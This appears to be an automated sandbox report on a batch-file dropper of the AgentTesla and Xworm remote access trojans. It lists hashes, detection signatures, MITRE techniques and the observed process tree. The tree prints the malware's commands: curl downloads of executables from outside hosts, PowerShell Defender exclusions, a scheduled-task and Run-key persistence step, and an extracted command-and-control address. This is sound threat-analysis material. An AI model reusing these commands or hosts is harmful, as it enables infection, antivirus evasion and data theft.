agenttesla | 770eedd081641838d18c615b60ea2658febcb6bb19a35a0fe1c569eeedb8026d

Analysis

max time kernel
128s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20231127-en
resource tags

arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
submitted
02-12-2023 10:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NEAS.GVCLIENTV35bat.bat
Size

20KB
MD5

a7793c10f4e024c789964be67375ab2a
SHA1

988d0af9a4ca435dd084ce541a250f6ba57f590a
SHA256

770eedd081641838d18c615b60ea2658febcb6bb19a35a0fe1c569eeedb8026d
SHA512

50e2b5c410fc1d865f446214bfc655ca64fcd17bde6e840f89bf4ecd2970203a173fc0d388a18cfd838b61bea397c0c9c851d7c946ec8d4343787162cd772f83
SSDEEP

384:QNJuPLwF+5InJhMFcJqJ+C7inKvcO3oF57talCp1h2wHdpIhG/8J/D8Au99mmBkn:CJuT48InJhMFcJqJ+C7inKvcO3oF57tO

Score

10^/10

agenttesla xworm keylogger persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

goofyah-26004.portmap.host:26004

Attributes

Install_directory
%AppData%
install_file
GVClientV4.exe

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Detect Xworm Payload 6 IoCs

Processes:

resource	yara_rule
C:\Windows\GV Client V4 BETA.exe	family_xworm
C:\Windows\GV Client V4 BETA.exe	family_xworm
C:\Windows\GV Client V4 BETA.exe	family_xworm
behavioral2/memory/2832-27-0x0000000000610000-0x000000000062A000-memory.dmp	family_xworm
C:\Users\Admin\AppData\Roaming\GVClientV4.exe	family_xworm
C:\Users\Admin\AppData\Roaming\GVClientV4.exe	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

AgentTesla payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2568-13-0x000001E4FFD10000-0x000001E4FFF26000-memory.dmp	family_agenttesla

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

GV Client V4 BETA.exea.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000\Control Panel\International\Geo\Nation	GV Client V4 BETA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000\Control Panel\International\Geo\Nation	a.exe

Drops startup file 2 IoCs

Processes:

GV Client V4 BETA.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GVClientV4.lnk	GV Client V4 BETA.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GVClientV4.lnk	GV Client V4 BETA.exe

Executes dropped EXE 4 IoCs

Processes:

GV-Loader.exea.exeGV Client V4 BETA.exeGVClientV4.exe

pid process

2568 GV-Loader.exe
1364 a.exe
2832 GV Client V4 BETA.exe
792 GVClientV4.exe

pid	process
2568	GV-Loader.exe
1364	a.exe
2832	GV Client V4 BETA.exe
792	GVClientV4.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

GV Client V4 BETA.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GVClientV4 = "C:\\Users\\Admin\\AppData\\Roaming\\GVClientV4.exe"	GV Client V4 BETA.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

44 ip-api.com
Drops file in Windows directory 1 IoCs

Processes:

a.exe

description ioc process

File created C:\Windows\GV Client V4 BETA.exe a.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

4848 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4740 timeout.exe

flow	ioc
44	ip-api.com

description	ioc	process
File created	C:\Windows\GV Client V4 BETA.exe	a.exe

pid	process
4848	schtasks.exe

pid	process
4740	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

GV-Loader.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	GV-Loader.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	GV-Loader.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	GV-Loader.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

2228 notepad.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1392 PING.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

GV Client V4 BETA.exe

pid process

2832 GV Client V4 BETA.exe

pid	process
2228	notepad.exe

pid	process
1392	PING.EXE

pid	process
2832	GV Client V4 BETA.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeGV Client V4 BETA.exe

pid	process
3572	powershell.exe
3572	powershell.exe
4612	powershell.exe
4612	powershell.exe
4316	powershell.exe
4316	powershell.exe
4316	powershell.exe
2244	powershell.exe
2244	powershell.exe
2244	powershell.exe
3036	powershell.exe
3036	powershell.exe
3036	powershell.exe
2832	GV Client V4 BETA.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

GV-Loader.exeGV Client V4 BETA.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeGVClientV4.exe

description	pid	process
Token: SeDebugPrivilege	2568	GV-Loader.exe
Token: SeDebugPrivilege	2832	GV Client V4 BETA.exe
Token: SeDebugPrivilege	3572	powershell.exe
Token: SeDebugPrivilege	4612	powershell.exe
Token: SeDebugPrivilege	4316	powershell.exe
Token: SeDebugPrivilege	2244	powershell.exe
Token: SeDebugPrivilege	3036	powershell.exe
Token: SeDebugPrivilege	2832	GV Client V4 BETA.exe
Token: SeDebugPrivilege	792	GVClientV4.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

GV Client V4 BETA.exe

pid process

2832 GV Client V4 BETA.exe

pid	process
2832	GV Client V4 BETA.exe

Suspicious use of WriteProcessMemory 38 IoCs

Processes:

cmd.exea.exeGV Client V4 BETA.execmd.exe

description	pid	process	target process
PID 4380 wrote to memory of 4892	4380	cmd.exe	cacls.exe
PID 4380 wrote to memory of 4892	4380	cmd.exe	cacls.exe
PID 4380 wrote to memory of 1404	4380	cmd.exe	curl.exe
PID 4380 wrote to memory of 1404	4380	cmd.exe	curl.exe
PID 4380 wrote to memory of 2328	4380	cmd.exe	curl.exe
PID 4380 wrote to memory of 2328	4380	cmd.exe	curl.exe
PID 4380 wrote to memory of 2172	4380	cmd.exe	curl.exe
PID 4380 wrote to memory of 2172	4380	cmd.exe	curl.exe
PID 4380 wrote to memory of 2228	4380	cmd.exe	notepad.exe
PID 4380 wrote to memory of 2228	4380	cmd.exe	notepad.exe
PID 4380 wrote to memory of 2568	4380	cmd.exe	GV-Loader.exe
PID 4380 wrote to memory of 2568	4380	cmd.exe	GV-Loader.exe
PID 4380 wrote to memory of 1364	4380	cmd.exe	a.exe
PID 4380 wrote to memory of 1364	4380	cmd.exe	a.exe
PID 4380 wrote to memory of 1364	4380	cmd.exe	a.exe
PID 4380 wrote to memory of 1392	4380	cmd.exe	PING.EXE
PID 4380 wrote to memory of 1392	4380	cmd.exe	PING.EXE
PID 1364 wrote to memory of 3572	1364	a.exe	powershell.exe
PID 1364 wrote to memory of 3572	1364	a.exe	powershell.exe
PID 1364 wrote to memory of 3572	1364	a.exe	powershell.exe
PID 1364 wrote to memory of 2832	1364	a.exe	GV Client V4 BETA.exe
PID 1364 wrote to memory of 2832	1364	a.exe	GV Client V4 BETA.exe
PID 2832 wrote to memory of 4612	2832	GV Client V4 BETA.exe	powershell.exe
PID 2832 wrote to memory of 4612	2832	GV Client V4 BETA.exe	powershell.exe
PID 2832 wrote to memory of 4316	2832	GV Client V4 BETA.exe	powershell.exe
PID 2832 wrote to memory of 4316	2832	GV Client V4 BETA.exe	powershell.exe
PID 2832 wrote to memory of 2244	2832	GV Client V4 BETA.exe	powershell.exe
PID 2832 wrote to memory of 2244	2832	GV Client V4 BETA.exe	powershell.exe
PID 2832 wrote to memory of 3036	2832	GV Client V4 BETA.exe	powershell.exe
PID 2832 wrote to memory of 3036	2832	GV Client V4 BETA.exe	powershell.exe
PID 2832 wrote to memory of 4848	2832	GV Client V4 BETA.exe	schtasks.exe
PID 2832 wrote to memory of 4848	2832	GV Client V4 BETA.exe	schtasks.exe
PID 2832 wrote to memory of 3976	2832	GV Client V4 BETA.exe	schtasks.exe
PID 2832 wrote to memory of 3976	2832	GV Client V4 BETA.exe	schtasks.exe
PID 2832 wrote to memory of 3584	2832	GV Client V4 BETA.exe	cmd.exe
PID 2832 wrote to memory of 3584	2832	GV Client V4 BETA.exe	cmd.exe
PID 3584 wrote to memory of 4740	3584	cmd.exe	timeout.exe
PID 3584 wrote to memory of 4740	3584	cmd.exe	timeout.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NEAS.GVCLIENTV35bat.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4380

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
2⤵
PID:4892

C:\Windows\system32\curl.exe
curl -s -o C:\Users\Admin\AppData\Local\Temp\GV-Loader.exe https://notfishvr.dev/cdn/GV-Loader.exe
2⤵
PID:1404

C:\Windows\system32\curl.exe
curl -s -o C:\Users\Admin\AppData\Local\Temp\HOW_TO_USE.txt https://cdn.discordapp.com/attachments/1171187025349709937/1176654675664191598/HOW_TO_USE.txt
2⤵
PID:2328

C:\Windows\system32\curl.exe
curl -s -o C:\Users\Admin\AppData\Roaming\a.exe https://cdn.discordapp.com/attachments/1172213687210225774/1179899267909951589/a.exe
2⤵
PID:2172

C:\Windows\system32\notepad.exe
notepad.exe C:\Users\Admin\AppData\Local\Temp\HOW_TO_USE.txt
2⤵
- Opens file in notepad (likely ransom note)
PID:2228

C:\Users\Admin\AppData\Local\Temp\GV-Loader.exe
C:\Users\Admin\AppData\Local\Temp\GV-Loader.exe
2⤵
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2568

C:\Users\Admin\AppData\Roaming\a.exe
C:\Users\Admin\AppData\Roaming\a.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1364

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AYQBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAcABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAagB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAYgBjACMAPgA="
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3572

C:\Windows\GV Client V4 BETA.exe
"C:\Windows\GV Client V4 BETA.exe"
3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\GV Client V4 BETA.exe'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'GV Client V4 BETA.exe'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\GVClientV4.exe'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'GVClientV4.exe'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3036

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "GVClientV4" /tr "C:\Users\Admin\AppData\Roaming\GVClientV4.exe"
4⤵
- Creates scheduled task(s)
PID:4848

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /f /tn "GVClientV4"
4⤵
PID:3976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6B72.tmp.bat""
4⤵
- Suspicious use of WriteProcessMemory
PID:3584

C:\Windows\system32\timeout.exe
timeout 3
5⤵
- Delays execution with timeout.exe
PID:4740

C:\Windows\system32\PING.EXE
ping -n 5 127.0.0.1
2⤵
- Runs ping.exe
PID:1392

C:\Users\Admin\AppData\Roaming\GVClientV4.exe
C:\Users\Admin\AppData\Roaming\GVClientV4.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:792

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
b51dc9e5ec3c97f72b4ca9488bbb4462

SHA1
5c1e8c0b728cd124edcacefb399bbd5e25b21bd3

SHA256
976f9534aa2976c85c2455bdde786a3f55d63aefdd40942eba1223c4c93590db

SHA512
0e5aa6cf64c535aefb833e5757b68e1094c87424abe2615a7d7d26b1b31eff358d12e36e75ca57fd690a9919b776600bf4c5c0e5a5df55366ba62238bdf3f280

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a2c8179aaa149c0b9791b73ce44c04d1

SHA1
703361b0d43ec7f669304e7c0ffbbfdeb1e484ff

SHA256
c1d30342a40a2b6e7553da30ceb85754d33820f6fbb3bbbed1ceb30d6390de4a

SHA512
2e201dd457d055baad86f68c15bcc7beb48d6dc2ffc10db7f304eb93f697e7b45991cbde857d25da2c9c60c23f3e13df8b5ed5809c1753737a23096e296cc9e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
95bb29ce22e6844175d9c8109590524c

SHA1
5c220efc17cd71c7701332ba2c1ae39e02373e13

SHA256
f0ac74dde7f11dccdca3a9f4a9aaf29a02cce855ab3d235783fb45951232db63

SHA512
58ca40bbed239a202a4d6630c25531b8d21437d003abfd88cd5b9a4a1aee50bd66fec168ad89bfd6b2283a876f88b05905022d92bb985a90253683fdc7a05c18

Download Submit
C:\Users\Admin\AppData\Local\Temp\GV-Loader.exe

Filesize
1.6MB

MD5
7954b6812ec1eefe82b89dea0c1c8001

SHA1
db444d74258448e24d7aa1a26d71cea4c7fe492b

SHA256
42810782549362049cba43c2000566a69575f31fb7d185453f3177412dbac231

SHA512
bdef3acef40c500f2fd7aa457f6c9f165d25e27a764b2d2ec96ec6e3c49bcb39eae061746b71f51b66c49de96bdac6ad07f04c8c1a015fe1e2a81579b6cb4ca5

Download Submit
C:\Users\Admin\AppData\Local\Temp\GV-Loader.exe

Filesize
1.6MB

MD5
7954b6812ec1eefe82b89dea0c1c8001

SHA1
db444d74258448e24d7aa1a26d71cea4c7fe492b

SHA256
42810782549362049cba43c2000566a69575f31fb7d185453f3177412dbac231

SHA512
bdef3acef40c500f2fd7aa457f6c9f165d25e27a764b2d2ec96ec6e3c49bcb39eae061746b71f51b66c49de96bdac6ad07f04c8c1a015fe1e2a81579b6cb4ca5

Download Submit
C:\Users\Admin\AppData\Local\Temp\HOW_TO_USE.txt

Filesize
555B

MD5
1c01acde55c409853a8bb588c523e810

SHA1
f4be783a9aaec4a89e3631b4e843fcc7d44bfdda

SHA256
a851dc4829abc9a3dc25f7f2959de008a151f11c934635f09e16926b73625872

SHA512
700bd27279429849f8392de2f0c36c842fed1b12baa5bf8b15e4d56116d44a0161f8a11d4e4a97af81c3ad09c1e842e5e26ff26252b8d4ff59a90f506f001372

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sszvkg0r.mgj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp6B72.tmp.bat

Filesize
146B

MD5
00c4ade55469e35cdb2ee9a50305d91e

SHA1
abf01856299ca85ca5b111603e5e7c7941e74892

SHA256
4009eda5ed067f6e4eade6212501c9d37a4969f0e2fd9d4f396bd9980f964bac

SHA512
e785779b9a5d14ca16a59eb48129f91605faad374f421cefea4db2e2294ddf84048219d4f4439955c7e6deda148773aab00d83e93f99c27440e6aeb7b181f10f

Download Submit
C:\Users\Admin\AppData\Roaming\GVClientV4.exe

Filesize
80KB

MD5
687f761162c7f606147b6cb4ec53f1b0

SHA1
c5becf98823cf61fa049da30a9bb74819aa62d75

SHA256
b29fb89932c2a4b8c10a2be6b5c0e5fccbe6f4e9a5eca3562983accd0b4d76c7

SHA512
29d5c802559c8d17d0959983999676f7f4925860ddea9b0e659e8931c2435b82804f02949ac4d8ea65ed1bbe814e731e5161a5170d1e589b79f609585bf82d26

Download Submit
C:\Users\Admin\AppData\Roaming\GVClientV4.exe

Filesize
80KB

MD5
687f761162c7f606147b6cb4ec53f1b0

SHA1
c5becf98823cf61fa049da30a9bb74819aa62d75

SHA256
b29fb89932c2a4b8c10a2be6b5c0e5fccbe6f4e9a5eca3562983accd0b4d76c7

SHA512
29d5c802559c8d17d0959983999676f7f4925860ddea9b0e659e8931c2435b82804f02949ac4d8ea65ed1bbe814e731e5161a5170d1e589b79f609585bf82d26

Download Submit
C:\Users\Admin\AppData\Roaming\a.exe

Filesize
85KB

MD5
f4fdac362f860520d28385d92c288a7c

SHA1
9d7add3ef8a94821eff53b9f3b6634a204248a08

SHA256
bb86852cf19f43f30561b6deb1f31735bebe157fcecdc74f5b7ba453c253b367

SHA512
097c06c9ae982308bd80be0d4d9c4bf439005f18861c49d662482dd30acdb52ca413e332e65899d5c058df681185cf0ce4bbf6e7a2ac40de75ed2cd4ba2acf6c

Download Submit
C:\Users\Admin\AppData\Roaming\a.exe

Filesize
85KB

MD5
f4fdac362f860520d28385d92c288a7c

SHA1
9d7add3ef8a94821eff53b9f3b6634a204248a08

SHA256
bb86852cf19f43f30561b6deb1f31735bebe157fcecdc74f5b7ba453c253b367

SHA512
097c06c9ae982308bd80be0d4d9c4bf439005f18861c49d662482dd30acdb52ca413e332e65899d5c058df681185cf0ce4bbf6e7a2ac40de75ed2cd4ba2acf6c

Download Submit
C:\Windows\GV Client V4 BETA.exe

Filesize
80KB

MD5
687f761162c7f606147b6cb4ec53f1b0

SHA1
c5becf98823cf61fa049da30a9bb74819aa62d75

SHA256
b29fb89932c2a4b8c10a2be6b5c0e5fccbe6f4e9a5eca3562983accd0b4d76c7

SHA512
29d5c802559c8d17d0959983999676f7f4925860ddea9b0e659e8931c2435b82804f02949ac4d8ea65ed1bbe814e731e5161a5170d1e589b79f609585bf82d26

Download Submit
C:\Windows\GV Client V4 BETA.exe

Filesize
80KB

MD5
687f761162c7f606147b6cb4ec53f1b0

SHA1
c5becf98823cf61fa049da30a9bb74819aa62d75

SHA256
b29fb89932c2a4b8c10a2be6b5c0e5fccbe6f4e9a5eca3562983accd0b4d76c7

SHA512
29d5c802559c8d17d0959983999676f7f4925860ddea9b0e659e8931c2435b82804f02949ac4d8ea65ed1bbe814e731e5161a5170d1e589b79f609585bf82d26

Download Submit
C:\Windows\GV Client V4 BETA.exe

Filesize
80KB

MD5
687f761162c7f606147b6cb4ec53f1b0

SHA1
c5becf98823cf61fa049da30a9bb74819aa62d75

SHA256
b29fb89932c2a4b8c10a2be6b5c0e5fccbe6f4e9a5eca3562983accd0b4d76c7

SHA512
29d5c802559c8d17d0959983999676f7f4925860ddea9b0e659e8931c2435b82804f02949ac4d8ea65ed1bbe814e731e5161a5170d1e589b79f609585bf82d26

Download Submit
memory/2244-126-0x00007FFA06400000-0x00007FFA06EC1000-memory.dmp

Filesize
10.8MB

Download
memory/2244-119-0x00007FFA06400000-0x00007FFA06EC1000-memory.dmp

Filesize
10.8MB

Download
memory/2568-14-0x000001E4FFC20000-0x000001E4FFC30000-memory.dmp

Filesize
64KB

Download
memory/2568-154-0x000001E4FFC20000-0x000001E4FFC30000-memory.dmp

Filesize
64KB

Download
memory/2568-9-0x000001E4FDC20000-0x000001E4FDDC2000-memory.dmp

Filesize
1.6MB

Download
memory/2568-67-0x000001E4FFC20000-0x000001E4FFC30000-memory.dmp

Filesize
64KB

Download
memory/2568-11-0x000001E4FFA50000-0x000001E4FFA62000-memory.dmp

Filesize
72KB

Download
memory/2568-12-0x00007FFA06400000-0x00007FFA06EC1000-memory.dmp

Filesize
10.8MB

Download
memory/2568-13-0x000001E4FFD10000-0x000001E4FFF26000-memory.dmp

Filesize
2.1MB

Download
memory/2568-15-0x000001E4FFC70000-0x000001E4FFCAC000-memory.dmp

Filesize
240KB

Download
memory/2568-64-0x00007FFA06400000-0x00007FFA06EC1000-memory.dmp

Filesize
10.8MB

Download
memory/2832-121-0x0000000002700000-0x0000000002710000-memory.dmp

Filesize
64KB

Download
memory/2832-69-0x00007FFA06400000-0x00007FFA06EC1000-memory.dmp

Filesize
10.8MB

Download
memory/2832-49-0x0000000002700000-0x0000000002710000-memory.dmp

Filesize
64KB

Download
memory/2832-27-0x0000000000610000-0x000000000062A000-memory.dmp

Filesize
104KB

Download
memory/2832-28-0x00007FFA06400000-0x00007FFA06EC1000-memory.dmp

Filesize
10.8MB

Download
memory/3036-129-0x000001FB20920000-0x000001FB20930000-memory.dmp

Filesize
64KB

Download
memory/3036-127-0x00007FFA06400000-0x00007FFA06EC1000-memory.dmp

Filesize
10.8MB

Download
memory/3036-128-0x000001FB20920000-0x000001FB20930000-memory.dmp

Filesize
64KB

Download
memory/3036-141-0x000001FB20920000-0x000001FB20930000-memory.dmp

Filesize
64KB

Download
memory/3036-143-0x000001FB20920000-0x000001FB20930000-memory.dmp

Filesize
64KB

Download
memory/3036-145-0x00007FFA06400000-0x00007FFA06EC1000-memory.dmp

Filesize
10.8MB

Download
memory/3572-33-0x00000000047B0000-0x00000000047C0000-memory.dmp

Filesize
64KB

Download
memory/3572-32-0x0000000004E70000-0x0000000005498000-memory.dmp

Filesize
6.2MB

Download
memory/3572-68-0x0000000006350000-0x0000000006382000-memory.dmp

Filesize
200KB

Download
memory/3572-29-0x0000000004800000-0x0000000004836000-memory.dmp

Filesize
216KB

Download
memory/3572-85-0x0000000006F60000-0x0000000007003000-memory.dmp

Filesize
652KB

Download
memory/3572-83-0x0000000006330000-0x000000000634E000-memory.dmp

Filesize
120KB

Download
memory/3572-86-0x00000000076E0000-0x0000000007D5A000-memory.dmp

Filesize
6.5MB

Download
memory/3572-70-0x0000000070700000-0x000000007074C000-memory.dmp

Filesize
304KB

Download
memory/3572-88-0x00000000070A0000-0x00000000070BA000-memory.dmp

Filesize
104KB

Download
memory/3572-30-0x00000000748E0000-0x0000000075090000-memory.dmp

Filesize
7.7MB

Download
memory/3572-99-0x00000000748E0000-0x0000000075090000-memory.dmp

Filesize
7.7MB

Download
memory/3572-71-0x000000007F640000-0x000000007F650000-memory.dmp

Filesize
64KB

Download
memory/3572-31-0x00000000047B0000-0x00000000047C0000-memory.dmp

Filesize
64KB

Download
memory/3572-102-0x0000000007110000-0x000000000711A000-memory.dmp

Filesize
40KB

Download
memory/3572-104-0x0000000007330000-0x00000000073C6000-memory.dmp

Filesize
600KB

Download
memory/3572-47-0x0000000004AD0000-0x0000000004AEE000-memory.dmp

Filesize
120KB

Download
memory/3572-105-0x00000000047B0000-0x00000000047C0000-memory.dmp

Filesize
64KB

Download
memory/3572-107-0x00000000047B0000-0x00000000047C0000-memory.dmp

Filesize
64KB

Download
memory/3572-106-0x00000000072C0000-0x00000000072D1000-memory.dmp

Filesize
68KB

Download
memory/3572-149-0x00000000748E0000-0x0000000075090000-memory.dmp

Filesize
7.7MB

Download
memory/3572-34-0x00000000055E0000-0x0000000005602000-memory.dmp

Filesize
136KB

Download
memory/3572-40-0x0000000005680000-0x00000000056E6000-memory.dmp

Filesize
408KB

Download
memory/3572-41-0x0000000005760000-0x00000000057C6000-memory.dmp

Filesize
408KB

Download
memory/3572-122-0x00000000047B0000-0x00000000047C0000-memory.dmp

Filesize
64KB

Download
memory/3572-123-0x0000000007300000-0x000000000730E000-memory.dmp

Filesize
56KB

Download
memory/3572-125-0x0000000007310000-0x0000000007324000-memory.dmp

Filesize
80KB

Download
memory/3572-142-0x00000000073E0000-0x00000000073E8000-memory.dmp

Filesize
32KB

Download
memory/3572-51-0x00000000047B0000-0x00000000047C0000-memory.dmp

Filesize
64KB

Download
memory/3572-46-0x00000000058D0000-0x0000000005C24000-memory.dmp

Filesize
3.3MB

Download
memory/3572-48-0x0000000006070000-0x00000000060BC000-memory.dmp

Filesize
304KB

Download
memory/3572-130-0x00000000073F0000-0x000000000740A000-memory.dmp

Filesize
104KB

Download
memory/4316-101-0x000001EBF4890000-0x000001EBF48A0000-memory.dmp

Filesize
64KB

Download
memory/4316-109-0x00007FFA06400000-0x00007FFA06EC1000-memory.dmp

Filesize
10.8MB

Download
memory/4316-100-0x000001EBF4890000-0x000001EBF48A0000-memory.dmp

Filesize
64KB

Download
memory/4316-89-0x00007FFA06400000-0x00007FFA06EC1000-memory.dmp

Filesize
10.8MB

Download
memory/4612-50-0x00007FFA06400000-0x00007FFA06EC1000-memory.dmp

Filesize
10.8MB

Download
memory/4612-52-0x000002224F0B0000-0x000002224F0C0000-memory.dmp

Filesize
64KB

Download
memory/4612-53-0x000002224F0B0000-0x000002224F0C0000-memory.dmp

Filesize
64KB

Download
memory/4612-63-0x000002224F070000-0x000002224F092000-memory.dmp

Filesize
136KB

Download
memory/4612-65-0x000002224F0B0000-0x000002224F0C0000-memory.dmp

Filesize
64KB

Download
memory/4612-66-0x000002224F0B0000-0x000002224F0C0000-memory.dmp

Filesize
64KB

Download
